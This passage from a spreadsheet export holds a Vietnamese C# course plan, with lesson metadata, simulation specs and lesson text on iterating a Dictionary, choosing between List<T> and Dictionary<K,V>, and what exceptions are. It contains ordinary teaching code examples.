- Chuyển sang tab **Keys**. Chỉ các khóa được lấy ra: ở mỗi lần lặp `k` là "An", "Bình", "Chi" và được in ra. Ô "Các khóa đã lấy" tăng dần, cuối cùng có 3 khóa: An, Bình, Chi. Điểm số không xuất hiện.
- Mở tab **Values**. Biến `sum` bắt đầu bằng 0, rồi lần lượt cộng 8 (sum = 8), cộng 6 (sum = 14), cộng 9 (sum = 23). Sau đó `avg = 23 / 3 = 7.67` và kết quả `7.67` được in ra.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-dictionary-k-v-va-lua-chon-collections/duyet-qua-dictionary-k-v/" title="Duyệt qua Dictionary" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `foreach` trên Dictionary cho mỗi lần lặp một cặp `KeyValuePair`. Khi chỉ cần một nửa dữ liệu, dùng `Keys` hoặc `Values` cho gọn và rõ ý.
## Mở rộng: Duyệt bằng LINQ
LINQ cho phép lọc và sắp xếp ngay khi duyệt. Mỗi phần tử mà LINQ xử lý vẫn là một `KeyValuePair`.
```csharp
using System;
using System.Collections.Generic;
using System.Linq;
public class Program
{
    public static void Main()
    {
        var scores = new Dictionary&lt;string, int&gt;
        {
            ["An"] = 8,
            ["Bình"] = 6,
            ["Chi"] = 9
        };
        foreach (var kv in scores.Where(p =&gt; p.Value &gt;= 8).OrderBy(p =&gt; p.Key))
        {
            Console.WriteLine(kv.Key + ": " + kv.Value);
        }
        // An: 8
        // Chi: 9
    }
}
```
## Tóm tắt
- `foreach (var kv in dict)` trả về từng `KeyValuePair` với `Key` và `Value`.
- `dict.Keys` chỉ chứa các khóa, `dict.Values` chỉ chứa các giá trị.
- Chọn cách duyệt theo nhu cầu: cần cả hai thì duyệt cặp, cần một nửa thì dùng `Keys` hoặc `Values`.
- Thứ tự duyệt không được bảo đảm. Cần thứ tự cố định thì dùng `SortedDictionary` hoặc `OrderBy`.
- Không thêm hoặc xóa phần tử của Dictionary trong lúc đang `foreach` chính nó.
- LINQ giúp lọc và sắp xếp gọn khi duyệt.</t>
        </is>
      </c>
    </row>
    <row r="12" ht="409.6" customHeight="1" s="18">
      <c r="A12" s="10" t="n">
        <v>11</v>
      </c>
      <c r="B12" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C12" s="10" t="inlineStr">
        <is>
          <t>Thao tác nâng cao với Dictionary&lt;K,V&gt; và lựa chọn Collections</t>
        </is>
      </c>
      <c r="D12" s="10" t="inlineStr">
        <is>
          <t>So sánh List&lt;T&gt; và Dictionary&lt;K,V&gt;: Khi nào sử dụng cái nào?</t>
        </is>
      </c>
      <c r="E12" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F12" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G12" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H12" s="10" t="inlineStr">
        <is>
          <t>Chọn đúng cấu trúc theo nhu cầu: tra theo khóa, lấy theo vị trí, hay cần giữ giá trị trùng.</t>
        </is>
      </c>
      <c r="I12" s="10" t="inlineStr">
        <is>
          <t>2 cột song song, 3 tab</t>
        </is>
      </c>
      <c r="J12" s="10" t="inlineStr">
        <is>
          <t>Trái dãy ô List, phải tủ ngăn Dictionary. Dưới mỗi cột là bảng điểm số bước; bước cuối gắn cờ 'phù hợp hơn' cho cột thắng ở tình huống đó.</t>
        </is>
      </c>
      <c r="K12" s="10" t="inlineStr">
        <is>
          <t>H01, H02, H22</t>
        </is>
      </c>
      <c r="L12" s="10" t="inlineStr">
        <is>
          <t>Tra theo mã | Lấy phần tử thứ 3 | Lưu giá trị trùng</t>
        </is>
      </c>
      <c r="M12" s="10" t="inlineStr">
        <is>
          <t>Tra theo mã (8 phần tử, tìm phần tử thứ 6): List quét 6 bước, Dictionary 1 bước → Dictionary phù hợp.
Lấy phần tử thứ 3: List dùng list[2] trong 1 bước; Dictionary không có chỉ số vị trí, phải duyệt → List phù hợp.
Lưu giá trị trùng: List chứa "An", "An" bình thường; Dictionary Add khóa "An" lần 2 → ArgumentException → khóa phải duy nhất.
Bước cuối: bảng tổng hợp 3 tình huống.</t>
        </is>
      </c>
      <c r="N12" s="10" t="inlineStr">
        <is>
          <t>8 sản phẩm SP01..SP08</t>
        </is>
      </c>
      <c r="O12" s="10" t="inlineStr">
        <is>
          <t>List: thứ tự và vị trí. Dictionary: tra nhanh theo khóa duy nhất. Có thể kết hợp, ví dụ Dictionary&lt;string, List&lt;T&gt;&gt;.</t>
        </is>
      </c>
      <c r="P12" s="10" t="inlineStr">
        <is>
          <t>Số bước được đếm từ dữ liệu thật trong mô phỏng.</t>
        </is>
      </c>
      <c r="Q12" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-dictionary-k-v-va-lua-chon-collections/so-sanh-list-t-va-dictionary-k-v-khi-nao-su-dung-cai-nao/index.html</t>
        </is>
      </c>
      <c r="R12" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-dictionary-k-v-va-lua-chon-collections/so-sanh-list-t-va-dictionary-k-v-khi-nao-su-dung-cai-nao/</t>
        </is>
      </c>
      <c r="S12" s="10" t="n"/>
      <c r="T12" s="12" t="n"/>
      <c r="U12" s="12" t="n"/>
      <c r="V12" s="21" t="inlineStr">
        <is>
          <t>So sánh List&lt;T&gt; và Dictionary&lt;K,V&gt;: Khi nào sử dụng cái nào?
Trong quá trình phát triển ứng dụng C#, việc lựa chọn cấu trúc dữ liệu phù hợp là một trong những quyết định quan trọng nhất ảnh hưởng đến hiệu suất và khả năng bảo trì của mã nguồn. Hai trong số các collection được sử dụng phổ biến nhất là List&lt;T&gt; và Dictionary&lt;K,V&gt;. Mặc dù cả hai đều dùng để lưu trữ tập hợp các đối tượng, chúng lại có những đặc tính và ưu điểm riêng, phù hợp với các tình huống sử dụng khác nhau. Trang này sẽ giúp bạn hiểu rõ sự khác biệt giữa chúng và đưa ra lựa chọn tối ưu cho từng bài toán cụ thể.
List&lt;T&gt;: Lưu trữ có thứ tự và truy cập theo chỉ mục
List&lt;T&gt; là một collection linh hoạt, đại diện cho một danh sách các đối tượng có thể thay đổi kích thước. Nó được xây dựng dựa trên một mảng động, cho phép bạn thêm, xóa và truy cập các phần tử một cách dễ dàng.
Ưu điểm của List&lt;T&gt;
Duy trì thứ tự chèn (Insertion Order): Các phần tử trong List&lt;T&gt; được lưu trữ theo đúng thứ tự mà chúng được thêm vào. Điều này rất quan trọng khi bạn cần bảo toàn trình tự của dữ liệu.
Truy cập nhanh chóng theo chỉ mục: Bạn có thể truy cập bất kỳ phần tử nào trong danh sách bằng chỉ mục số nguyên (bắt đầu từ 0) của nó. Thao tác này có độ phức tạp thời gian là O(1) (hằng số), nghĩa là thời gian truy cập không phụ thuộc vào kích thước của danh sách.
Linh hoạt trong việc thêm/xóa ở cuối: Việc thêm một phần tử vào cuối List&lt;T&gt; hoặc xóa phần tử cuối cùng thường rất hiệu quả, với độ phức tạp thời gian trung bình là O(1). Mặc dù đôi khi cần tái cấp phát bộ nhớ khi danh sách đầy, nhưng cơ chế này được tối ưu để hiệu quả trong hầu hết các trường hợp.
Dễ dàng duyệt qua:List&lt;T&gt; có thể được duyệt qua một cách tuần tự bằng vòng lặp for hoặc foreach, rất tiện lợi khi bạn cần xử lý từng phần tử theo thứ tự.
Khi nào nên chọn List&lt;T&gt;?
Bạn nên chọn List&lt;T&gt; khi:
Bạn cần một danh sách đơn giản các đối tượng mà thứ tự của chúng là quan trọng.
Bạn chủ yếu truy cập các phần tử theo vị trí (chỉ mục) hoặc duyệt qua toàn bộ danh sách.
Bạn thường xuyên thêm hoặc xóa các phần tử ở cuối danh sách.
Bạn không cần tìm kiếm các phần tử dựa trên một "khóa" duy nhất, mà chủ yếu là duyệt hoặc tìm kiếm tuần tự.
Ví dụ:
// Danh sách các tên học sinh, thứ tự có thể quan trọng (ví dụ: thứ tự đăng ký)
List&lt;string&gt; tenHocSinh = new List&lt;string&gt;();
tenHocSinh.Add("Nguyễn Văn A");
tenHocSinh.Add("Trần Thị B");
tenHocSinh.Add("Lê Minh C");
// Truy cập theo chỉ mục
Console.WriteLine($"Học sinh đầu tiên: {tenHocSinh[0]}"); // Nguyễn Văn A
// Danh sách các bước trong một quy trình
List&lt;string&gt; cacBuocQuyTrinh = new List&lt;string&gt;
{
    "Khởi tạo",
    "Xử lý dữ liệu",
    "Ghi kết quả",
    "Hoàn thành"
};
Dictionary&lt;K,V&gt;: Lưu trữ theo cặp khóa-giá trị và tìm kiếm nhanh
Dictionary&lt;K,V&gt; là một collection lưu trữ dữ liệu dưới dạng các cặp khóa-giá trị (key-value pairs). Mỗi khóa phải là duy nhất và được sử dụng để truy xuất giá trị tương ứng. Dictionary&lt;K,V&gt; được triển khai bằng cách sử dụng bảng băm (hash table), mang lại hiệu suất tìm kiếm vượt trội.
Ưu điểm của Dictionary&lt;K,V&gt;
Truy cập nhanh chóng theo khóa: Đây là ưu điểm nổi bật nhất của Dictionary&lt;K,V&gt;. Việc tìm kiếm, thêm hoặc xóa một phần tử dựa trên khóa có độ phức tạp thời gian trung bình là O(1). Điều này làm cho Dictionary&lt;K,V&gt; cực kỳ hiệu quả khi bạn cần truy xuất dữ liệu nhanh chóng dựa trên một định danh duy nhất.
Lưu trữ dữ liệu có quan hệ:Dictionary&lt;K,V&gt; lý tưởng để lưu trữ các tập dữ liệu mà mỗi "bản ghi" có thể được xác định bằng một khóa duy nhất, tạo ra một ánh xạ rõ ràng giữa khóa và giá trị.
Đảm bảo tính duy nhất của khóa:Dictionary&lt;K,V&gt; tự động đảm bảo rằng mỗi khóa chỉ xuất hiện một lần. Nếu bạn cố gắng thêm một khóa đã tồn tại, nó sẽ gây ra lỗi hoặc bạn có thể cập nhật giá trị của khóa đó.
Khi nào nên chọn Dictionary&lt;K,V&gt;?
Bạn nên chọn Dictionary&lt;K,V&gt; khi:
Bạn cần tìm kiếm, truy cập hoặc thao tác dữ liệu cực kỳ nhanh chóng dựa trên một giá trị định danh duy nhất (khóa).
Bạn cần lưu trữ các đối tượng có cấu trúc bản ghi, nơi mỗi bản ghi có một "ID" hoặc "tên" duy nhất.
Thứ tự của các phần tử không quan trọng hoặc không cần phải được duy trì.
Bạn cần một ánh xạ (mapping) giữa một khóa và một giá trị.
Ví dụ:
// Danh sách người dùng, truy cập nhanh bằng ID
Dictionary&lt;int, string&gt; danhSachNguoiDung = new Dictionary&lt;int, string&gt;();
danhSachNguoiDung.Add(101, "Alice");
danhSachNguoiDung.Add(102, "Bob");
danhSachNguoiDung.Add(103, "Charlie");
// Truy cập nhanh bằng khóa
Console.WriteLine($"Tên người dùng có ID 102: {danhSachNguoiDung[102]}"); // Bob
// Cấu hình ứng dụng
Dictionary&lt;string, string&gt; cauHinhUngDung = new Dictionary&lt;string, string&gt;
{
    { "Theme", "Dark" },
    { "LogLevel", "Info" },
    { "DatabaseConnection", "Server=localhost;..." }
};
Console.WriteLine($"Chủ đề hiện tại: {cauHinhUngDung["Theme"]}"); // Dark
Để tìm hiểu thêm về cách duyệt qua các phần tử của Dictionary&lt;K,V&gt;, bạn có thể tham khảo bài đọc "Duyệt qua Dictionary&lt;K,V&gt;" trong cùng bài học này.
Các yếu tố cần cân nhắc khi lựa chọn
Khi quyết định giữa List&lt;T&gt; và Dictionary&lt;K,V&gt;, hãy xem xét các yếu tố sau:
Yêu cầu về thứ tự
Nếu thứ tự chèn của các phần tử là quan trọng và cần được duy trì, hãy chọn List&lt;T&gt;.
Nếu thứ tự không quan trọng hoặc có thể thay đổi, Dictionary&lt;K,V&gt; vẫn là một lựa chọn tốt nếu phù hợp với các yếu tố khác.
Cách truy cập dữ liệu
Nếu bạn chủ yếu truy cập dữ liệu bằng chỉ mục số nguyên (ví dụ: phần tử thứ 5, phần tử cuối cùng) hoặc duyệt tuần tự, List&lt;T&gt; là lựa chọn tối ưu.
Nếu bạn cần truy cập dữ liệu nhanh chóng bằng một giá trị định danh duy nhất (khóa), Dictionary&lt;K,V&gt; là lựa chọn vượt trội.
Hiệu suất
Tìm kiếm:Dictionary&lt;K,V&gt; cung cấp hiệu suất tìm kiếm O(1) (trung bình) theo khóa, trong khi List&lt;T&gt; yêu cầu tìm kiếm tuần tự O(n) theo giá trị (trừ khi bạn biết chỉ mục).
Thêm/Xóa:
Thêm/xóa ở cuối List&lt;T&gt; là O(1) (trung bình). Thêm/xóa ở giữa List&lt;T&gt; là O(n).
Thêm/xóa trong Dictionary&lt;K,V&gt; là O(1) (trung bình) cho một khóa đã biết.
Bộ nhớ
List&lt;T&gt; thường sử dụng ít bộ nhớ hơn một chút so với Dictionary&lt;K,V&gt; cho cùng một số lượng phần tử, vì Dictionary&lt;K,V&gt; cần lưu trữ cả khóa và giá trị, cùng với cấu trúc bảng băm để quản lý các cặp này. Tuy nhiên, đối với hầu hết các ứng dụng, sự khác biệt này không đáng kể trừ khi bạn làm việc với tập dữ liệu cực lớn.
Tính duy nhất của phần tử/khóa
List&lt;T&gt; cho phép các phần tử trùng lặp.
Dictionary&lt;K,V&gt; yêu cầu các khóa phải là duy nhất. Nếu bạn cần đảm bảo tính duy nhất của một trường nào đó, Dictionary&lt;K,V&gt; có thể hỗ trợ điều này thông qua khóa.
Kết luận
Không có "cấu trúc dữ liệu tốt nhất" tuyệt đối; chỉ có cấu trúc dữ liệu phù hợp nhất cho từng tình huống cụ thể. List&lt;T&gt; xuất sắc trong việc quản lý các tập hợp có thứ tự và truy cập theo chỉ mục, trong khi Dictionary&lt;K,V&gt; không thể đánh bại về tốc độ truy xuất dữ liệu theo khóa. Bằng cách hiểu rõ đặc tính, ưu nhược điểm và yêu cầu của bài toán, bạn sẽ có thể đưa ra lựa chọn sáng suốt, xây dựng các ứng dụng C# hiệu quả và mạnh mẽ hơn.</t>
        </is>
      </c>
      <c r="W12" s="22" t="inlineStr">
        <is>
          <t># So sánh List&lt;T&gt; và Dictionary&lt;K,V&gt;: Khi nào sử dụng cái nào?
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Mô tả đặc điểm chính của `List&lt;T&gt;` (có thứ tự, có chỉ số) và `Dictionary&lt;TKey, TValue&gt;` (tra theo khóa duy nhất).
- Chọn đúng cấu trúc khi cần tra theo mã, lấy theo vị trí hoặc lưu giá trị trùng.
- So sánh số bước cần để tìm một phần tử trong `List` và trong `Dictionary`.
- Giải thích vì sao `Dictionary` báo lỗi khi thêm khóa trùng còn `List` thì không.
- Quan sát hai cấu trúc cùng xử lý một nhu cầu bằng hoạt động mô phỏng.
## Hai cấu trúc, hai thế mạnh
Cả `List&lt;T&gt;` và `Dictionary&lt;TKey, TValue&gt;` đều chứa nhiều phần tử, nhưng cách tổ chức khác nhau nên hợp với những việc khác nhau. Không có cấu trúc "tốt nhất" tuyệt đối, chỉ có cấu trúc **phù hợp nhất** với nhu cầu.
### List&lt;T&gt;: có thứ tự và có chỉ số
`List&lt;T&gt;` là danh sách có thể đổi kích thước, các phần tử xếp theo thứ tự thêm vào và mỗi phần tử có một **chỉ số** bắt đầu từ 0.
- Lấy phần tử theo chỉ số (`list[2]`) rất nhanh: nhảy thẳng tới ô đó.
- Cho phép giá trị **trùng lặp**.
- Muốn tìm một giá trị khi không biết vị trí, phải quét từ đầu, tức là duyệt từng phần tử.
```csharp
var tenHocSinh = new List&lt;string&gt; { "An", "Bình", "Chi" };
Console.WriteLine(tenHocSinh[0]);   // An
```
### Dictionary&lt;TKey, TValue&gt;: tra nhanh theo khóa
`Dictionary` lưu các cặp khóa - giá trị. Mỗi khóa phải **duy nhất** và dùng để tìm giá trị tương ứng.
- Tra, thêm, xóa theo khóa rất nhanh (trung bình gần như không phụ thuộc số phần tử), vì đi thẳng tới "ngăn" có nhãn đó.
- **Khóa không được trùng.** Thêm khóa đã có bằng `Add()` sẽ ném `ArgumentException`.
- **Không có chỉ số vị trí.** Không có `dict[2]` để lấy "phần tử thứ 3", và thứ tự duyệt không được bảo đảm.
```csharp
var tenNguoiDung = new Dictionary&lt;int, string&gt;
{
    [101] = "Alice",
    [102] = "Bob"
};
Console.WriteLine(tenNguoiDung[102]);   // Bob
```
## Bảng so sánh
| Tiêu chí | `List&lt;T&gt;` | `Dictionary&lt;TKey, TValue&gt;` |
|---|---|---|
| Tra theo mã/khóa | Phải quét từng phần tử | Đi thẳng tới ngăn, rất nhanh |
| Lấy theo vị trí | `list[i]`, nhanh | Không có chỉ số vị trí |
| Giá trị trùng | Cho phép | Khóa phải duy nhất |
| Thứ tự | Theo thứ tự thêm vào | Không bảo đảm |
| Bộ nhớ | Ít hơn | Nhiều hơn một chút (lưu cả khóa và cấu trúc tra cứu) |
## Cách chọn nhanh
- Cần tra thường xuyên theo một mã định danh (mã sản phẩm, ID, tên đăng nhập): chọn `Dictionary`.
- Cần giữ thứ tự, lấy theo vị trí hoặc duyệt hết từ đầu đến cuối: chọn `List`.
- Cần lưu cả giá trị trùng nhau: chọn `List`.
- Cần vừa tra theo khóa vừa gom nhiều phần tử dưới mỗi khóa: kết hợp, ví dụ `Dictionary&lt;string, List&lt;T&gt;&gt;`.
## Hoạt động: Cùng một nhu cầu, hai cấu trúc
Mô phỏng dưới đây chia hai cột: cột trái là `List&lt;string&gt;`, cột phải là `Dictionary&lt;string, int&gt;`. Hai cột cùng xử lý một nhu cầu. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để hai cột cùng chạy:
- Mở tab **Tra theo mã**. Cần tìm sản phẩm SP06 trong 8 sản phẩm (SP01 đến SP08). Cột trái (List) phải so sánh lần lượt SP01, SP02, ... cho đến SP06, mất 6 bước, các ô đã loại được đánh dấu mờ. Cột phải (Dictionary) đi thẳng tới ngăn SP06 qua `dict["SP06"]`, chỉ 1 bước.
- Chuyển sang tab **Lấy phần tử thứ 3**. Cột trái dùng `list[2]` (chỉ số bắt đầu từ 0) nhảy thẳng tới ô số 2, lấy được "SP03" chỉ trong 1 bước. Cột phải không có `dict[2]`, nên phải duyệt và đếm tới ngăn thứ 3, mất 3 bước, và thứ tự duyệt cũng không được bảo đảm.
- Mở tab **Lưu giá trị trùng**. Cả hai bên cùng lưu "An" hai lần. Cột trái: List nhận cả hai, có 2 phần tử. Cột phải: lần `Add("An", 2)` thứ hai bị lỗi, khung đỏ hiện `ArgumentException` với thông điệp `An item with the same key has already been added. Key: An`, và Dictionary chỉ giữ 1 ngăn "An".
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-dictionary-k-v-va-lua-chon-collections/so-sanh-list-t-va-dictionary-k-v-khi-nao-su-dung-cai-nao/" title="List hay Dictionary?" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi cấu trúc thắng ở một việc. Dictionary thắng khi tra theo khóa (1 bước so với 6), List thắng khi lấy theo vị trí (1 bước so với 3) và khi cần lưu giá trị trùng (2 phần tử so với 1).
## Tóm tắt
- `List&lt;T&gt;` có thứ tự, có chỉ số, cho phép giá trị trùng. Tìm theo giá trị phải quét từng phần tử.
- `Dictionary&lt;TKey, TValue&gt;` tra nhanh theo khóa duy nhất nhưng không có chỉ số vị trí.
- Thêm khóa trùng bằng `Add()` làm `Dictionary` ném `ArgumentException`.
- Tra theo mã: chọn `Dictionary`. Lấy theo vị trí hoặc giữ giá trị trùng: chọn `List`.
- Có thể kết hợp hai cấu trúc, ví dụ `Dictionary&lt;string, List&lt;T&gt;&gt;`, khi bài toán cần cả hai.</t>
        </is>
      </c>
    </row>
    <row r="13" ht="409.6" customHeight="1" s="18">
      <c r="A13" s="10" t="n">
        <v>12</v>
      </c>
      <c r="B13" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C13" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Exception và Tầm quan trọng</t>
        </is>
      </c>
      <c r="D13" s="10" t="inlineStr">
        <is>
          <t>Exception là gì?</t>
        </is>
      </c>
      <c r="E13" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F13" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G13" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H13" s="10" t="inlineStr">
        <is>
          <t>Thấy exception là một đối tượng được 'ném' ra khi có lỗi lúc chạy, và nếu không ai bắt thì chương trình dừng ngay tại đó.</t>
        </is>
      </c>
      <c r="I13" s="10" t="inlineStr">
        <is>
          <t>1 cột, có ô nhập chuỗi (chips gợi ý)</t>
        </is>
      </c>
      <c r="J13" s="10" t="inlineStr">
        <is>
          <t>Mã nguồn tô dòng đang chạy. Khi lỗi, thẻ Exception đỏ bật lên cạnh dòng gây lỗi; các dòng phía sau mờ đi với nhãn 'không được chạy'; console in thông báo lỗi.</t>
        </is>
      </c>
      <c r="K13" s="10" t="inlineStr">
        <is>
          <t>H03</t>
        </is>
      </c>
      <c r="L13" s="10" t="inlineStr">
        <is>
          <t>1 tab, ô nhập 'input' (mặc định abc; gợi ý: 20, abc, rỗng, -5)</t>
        </is>
      </c>
      <c r="M13" s="10" t="inlineStr">
        <is>
          <t>Console.Write("Nhập tuổi: "); input = giá trị trong ô nhập.
int age = int.Parse(input) → với "abc", .NET tạo một đối tượng FormatException và ném ra.
Thẻ đỏ: FormatException, "The input string 'abc' was not in a correct format."
Không có try-catch nên chương trình dừng; hai dòng in phía sau mờ đi.
Với "20": chạy hết và in "Năm sau bạn 21 tuổi". Với "-5": không lỗi (chỉ là dữ liệu sai nghiệp vụ, không phải exception).</t>
        </is>
      </c>
      <c r="N13" s="10" t="inlineStr">
        <is>
          <t>Ô nhập: abc (mặc định), 20, rỗng, -5</t>
        </is>
      </c>
      <c r="O13" s="10" t="inlineStr">
        <is>
          <t>Exception là sự cố lúc chạy, được biểu diễn bằng một đối tượng; không bắt thì chương trình dừng. Lỗi định dạng khác lỗi nghiệp vụ.</t>
        </is>
      </c>
      <c r="P13" s="10" t="inlineStr">
        <is>
          <t>Thông điệp theo .NET 8: "The input string 'abc' was not in a correct format." (bản cũ: "Input string was not in a correct format."). Ô nhập cần cho phép chuỗi rỗng và dấu '-'.</t>
        </is>
      </c>
      <c r="Q13" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/exception-la-gi/index.html</t>
        </is>
      </c>
      <c r="R13" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/exception-la-gi/</t>
        </is>
      </c>
      <c r="S13" s="10" t="n"/>
      <c r="T13" s="12" t="n"/>
      <c r="U13" s="12" t="n"/>
      <c r="V13" s="21" t="inlineStr">
        <is>
          <t>Exception là gì?
Trong lập trình, mọi thứ không phải lúc nào cũng diễn ra suôn sẻ theo kịch bản lý tưởng. Sẽ có những lúc chương trình của bạn gặp phải các tình huống bất ngờ, nằm ngoài luồng xử lý thông thường. Đây chính là lúc khái niệm "Exception" trở nên vô cùng quan trọng.
Định nghĩa Exception
Exception (ngoại lệ) là một sự kiện xảy ra trong quá trình thực thi chương trình (runtime) làm gián đoạn luồng bình thường của lệnh. Khi một exception xảy ra, chương trình sẽ ngừng thực hiện các lệnh tiếp theo trong khối mã hiện tại và tìm kiếm một cơ chế để xử lý sự kiện bất thường này.
Hãy hình dung chương trình của bạn như một dây chuyền sản xuất. Bình thường, các sản phẩm sẽ tuần tự đi qua từng công đoạn. Nhưng đột nhiên, một máy móc bị hỏng, hoặc một nguyên liệu không đạt chuẩn được đưa vào. Sự kiện "máy hỏng" hay "nguyên liệu lỗi" chính là một exception. Nó làm gián đoạn dây chuyền, và nếu không được xử lý, toàn bộ dây chuyền có thể ngừng hoạt động hoặc tạo ra sản phẩm lỗi.
Trong lập trình, một exception có thể phát sinh từ nhiều nguyên nhân khác nhau, chẳng hạn như:
Dữ liệu đầu vào không hợp lệ (ví dụ: người dùng nhập chữ vào ô yêu cầu số).
Cố gắng truy cập một tài nguyên không tồn tại (ví dụ: đọc một tập tin đã bị xóa).
Lỗi logic toán học (ví dụ: chia một số cho 0).
Vấn đề về bộ nhớ hoặc hệ thống.
Mục tiêu của việc xử lý exception là để chương trình có thể "bắt" được các sự kiện bất thường này và thực hiện các hành động khắc phục, thay vì bị dừng đột ngột (crash).
Phân biệt Lỗi Biên dịch và Lỗi Chạy
Để hiểu rõ hơn về exception, chúng ta cần phân biệt hai loại lỗi cơ bản trong lập trình:
Lỗi Biên dịch (Compile-time Errors)
Lỗi biên dịch xảy ra trong giai đoạn biên dịch mã nguồn thành mã máy hoặc mã trung gian (như IL trong C#). Đây thường là các lỗi về cú pháp, ngữ pháp của ngôn ngữ lập trình hoặc lỗi kiểu dữ liệu.
Ví dụ:
Thiếu dấu chấm phẩy (;) ở cuối câu lệnh.
Khai báo một biến nhưng chưa định nghĩa kiểu dữ liệu.
Gọi một phương thức không tồn tại hoặc sai tên.
// Ví dụ lỗi biên dịch: Thiếu dấu chấm phẩy
public class MyProgram
{
    public static void Main(string[] args)
    {
        Console.WriteLine("Hello World") // Lỗi: Thiếu ';'
    }
}
Trình biên dịch (compiler) sẽ phát hiện ra những lỗi này và không cho phép chương trình được xây dựng thành công. Bạn sẽ nhận được thông báo lỗi từ IDE (như Visual Studio) và không thể chạy ứng dụng cho đến khi các lỗi này được sửa. Lỗi biên dịch ngăn chặn chương trình khởi động hoàn toàn.
Lỗi Chạy (Runtime Errors)
Lỗi chạy, hay lỗi thời gian thực thi, xảy ra khi chương trình đã được biên dịch thành công và đang chạy. Những lỗi này không thể được phát hiện bởi trình biên dịch vì chúng thường phụ thuộc vào dữ liệu đầu vào, trạng thái của hệ thống hoặc các điều kiện phát sinh trong quá trình chương trình hoạt động.
Ví dụ:
Chia một số cho 0 (ví dụ: 10 / 0).
Cố gắng truy cập một phần tử ngoài giới hạn của mảng.
Cố gắng sử dụng một đối tượng chưa được khởi tạo (null reference).
Định dạng dữ liệu không hợp lệ khi chuyển đổi kiểu (ví dụ: chuyển "abc" thành số nguyên).
// Ví dụ lỗi chạy: Chia cho 0
public class MyProgram
{
    public static void Main(string[] args)
    {
        int numerator = 10;
        int denominator = 0;
        int result = numerator / denominator; // Lỗi này sẽ xảy ra khi chương trình chạy
        Console.WriteLine(result);
    }
}
Khi một lỗi chạy xảy ra mà không được xử lý, nó sẽ tạo ra một Exception. Nếu exception này không được "bắt" và quản lý, chương trình sẽ dừng đột ngột và hiển thị thông báo lỗi cho người dùng (hoặc ghi vào log hệ thống). Các exception chính là cơ chế để lập trình viên có thể chủ động đối phó với những tình huống bất ngờ này.
Vai trò của Exception trong việc Thông báo và Quản lý các Tình huống Bất thường
Exception không chỉ là một sự kiện lỗi, mà còn là một công cụ mạnh mẽ để thông báo và quản lý các tình huống bất thường trong chương trình C#.
1. Thông báo lỗi một cách có cấu trúc
Khi một tình huống bất thường xảy ra, thay vì chỉ trả về một mã lỗi hoặc giá trị null khó hiểu, hệ thống sẽ "ném" (throw) một đối tượng Exception. Đối tượng này chứa đựng rất nhiều thông tin hữu ích về lỗi, bao gồm:
Loại Exception: Cho biết cụ thể lỗi gì đã xảy ra (ví dụ: DivideByZeroException, FormatException).
Thông điệp lỗi (Message): Một chuỗi mô tả chi tiết về nguyên nhân lỗi.
Stack Trace: Chuỗi các hàm đã được gọi cho đến khi exception xảy ra, giúp bạn xác định chính xác vị trí lỗi trong mã nguồn.
Nhờ có cấu trúc này, việc xác định nguyên nhân và vị trí lỗi trở nên dễ dàng hơn rất nhiều so với các phương pháp xử lý lỗi truyền thống chỉ dựa vào mã trả về.
2. Quản lý và phục hồi chương trình
Vai trò quan trọng nhất của exception là cho phép lập trình viên "bắt" (catch) các lỗi chạy và thực hiện các hành động quản lý phù hợp. Thay vì để chương trình bị crash, bạn có thể:
Ghi nhật ký (Log) lỗi: Lưu trữ thông tin chi tiết về exception vào một tệp log để phân tích sau này, giúp cải thiện chất lượng ứng dụng.
Thông báo cho người dùng: Hiển thị một thông báo thân thiện, dễ hiểu cho người dùng về sự cố đã xảy ra, thay vì một màn hình lỗi kỹ thuật.
Phục hồi hoặc thay thế: Cố gắng khắc phục tình huống (ví dụ: thử lại thao tác, sử dụng giá trị mặc định) hoặc chuyển hướng chương trình sang một luồng xử lý an toàn khác.
Đóng ứng dụng một cách an toàn: Trong trường hợp không thể phục hồi, đảm bảo rằng mọi tài nguyên đã được giải phóng và dữ liệu được lưu trữ trước khi chương trình kết thúc.
Việc xử lý exception hiệu quả giúp tăng tính ổn định, độ bền và trải nghiệm người dùng của ứng dụng. Nó cho phép chương trình của bạn "sống sót" qua những tình huống không mong muốn và tiếp tục hoạt động hoặc kết thúc một cách có kiểm soát.
Trong các bài học tiếp theo, chúng ta sẽ đi sâu vào các loại exception phổ biến trong C# và cách sử dụng cấu trúc try/catch để bắt và xử lý chúng một cách hiệu quả.</t>
        </is>
      </c>
      <c r="W13" s="22" t="inlineStr">
        <is>
          <t># Exception là gì?
## Mục tiêu học tập
Sau bài học này, bạn có thể:
